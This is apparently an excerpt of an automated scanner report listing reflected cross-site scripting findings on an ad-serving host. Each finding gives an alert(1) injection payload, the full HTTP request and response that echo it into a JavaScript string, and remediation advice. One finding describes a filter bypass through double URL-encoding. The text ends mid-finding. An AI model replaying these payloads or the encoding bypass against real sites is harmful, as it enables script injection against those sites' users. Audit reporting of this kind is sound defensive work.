The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b60a0'-alert(1)-'db9c19dffc0 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639b60a0'-alert(1)-'db9c19dffc0&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:40:09 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:09 GMT; path=/ Set-Cookie: i_1=33:353:22:3:0:34115:1296351609:B2|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:40:09 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 881
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639b60a0'-alert(1)-'db9c19dffc0&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } f ...[SNIP]...
The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db6f1'-alert(1)-'76b72a8b0c6 was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!db6f1'-alert(1)-'76b72a8b0c6&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:40:00 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:00 GMT; path=/ Set-Cookie: i_1=33:353:812:3:0:34115:1296351600:B2|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:40:00 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 876
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!db6f1'-alert(1)-'76b72a8b0c6&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a3b0'-alert(1)-'e3b21ac569d was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=13946061254a3b0'-alert(1)-'e3b21ac569d&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:40:49 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:49 GMT; path=/ Set-Cookie: i_1=33:353:78:3:0:34115:1296351649:B2|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:40:49 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 872
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=13946061254a3b0'-alert(1)-'e3b21ac569d&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.writ ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc491'-alert(1)-'2e6b8e0e1b9 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8dc491'-alert(1)-'2e6b8e0e1b9 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:41:31 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:41:31 GMT; path=/ Set-Cookie: i_1=33:353:811:3:0:34115:1296351691:B2|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:41:31 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 875
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8dc491'-alert(1)-'2e6b8e0e1b9'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7f ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bdca'-alert(1)-'8e62565ed1b was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ2bdca'-alert(1)-'8e62565ed1b&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:41:14 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:41:14 GMT; path=/ Set-Cookie: i_1=33:353:78:3:0:34115:1296351674:B2|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:41:14 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 872
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ2bdca'-alert(1)-'8e62565ed1b&ASID=0932f0fa7bd044ce92444252d58da2c8'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.write('<a href ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d80d9%2522%253balert%25281%2529%252f%252f1b378966a2b was submitted in the REST URL parameter 2. This input was echoed as d80d9";alert(1)//1b378966a2b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357d80d9%2522%253balert%25281%2529%252f%252f1b378966a2b/353.0.js.120x30/1296350884** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; c_1=33:967:555:0:0:36941:1294800536:L; o=1:1;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 02:05:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1593
function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6'); try { axo.AllowScriptAccess = 'always'; } catch(e) {return '6,0,0';} } catch(e) {} try { retu ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357d80d9";alert(1)//1b378966a2b/353.0.js.120x30/1296353113**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67a19%2522%253balert%25281%2529%252f%252fee7b513d736 was submitted in the REST URL parameter 3. This input was echoed as 67a19";alert(1)//ee7b513d736 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x3067a19%2522%253balert%25281%2529%252f%252fee7b513d736/1296350884** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; c_1=33:967:555:0:0:36941:1294800536:L; o=1:1;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 02:05:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1593
function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6'); try { axo.AllowScriptAccess = 'always'; } catch(e) {return '6,0,0';} } catch(e) {} try { retu ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x3067a19";alert(1)//ee7b513d736/1296353115**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77762'-alert(1)-'d9eb44523fa was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=2825348877762'-alert(1)-'d9eb44523fa&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:40:35 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:35 GMT; path=/ Set-Cookie: i_1=33:353:198:3:0:34115:1296351635:B2|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:40:35 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 876
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=2825348877762'-alert(1)-'d9eb44523fa&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function wsod_image() {
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64672'-alert(1)-'6bd526f1d90 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G64672'-alert(1)-'6bd526f1d90&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:40:22 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:22 GMT; path=/ Set-Cookie: i_1=33:353:198:3:0:34115:1296351622:B2|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:40:22 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 876
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G64672'-alert(1)-'6bd526f1d90&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } functio ...[SNIP]...
5.116. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4276'-alert(1)-'863aa542d6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8&f4276'-alert(1)-'863aa542d6f=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:42:56 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:42:56 GMT; path=/ Set-Cookie: i_1=33:353:811:3:0:34115:1296351776:B2|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:42:56 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 878
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8&f4276'-alert(1)-'863aa542d6f=1'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bdbc'-alert(1)-'ace8d71b6ef was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=80106398bdbc'-alert(1)-'ace8d71b6ef&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:49:18 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:18 GMT; path=/ Set-Cookie: i_1=33:353:812:3:0:38345:1296398958:L|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 14:49:18 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 847
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=80106398bdbc'-alert(1)-'ace8d71b6ef&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } fu ...[SNIP]...
The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fc35'-alert(1)-'1d1a7e71671 was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
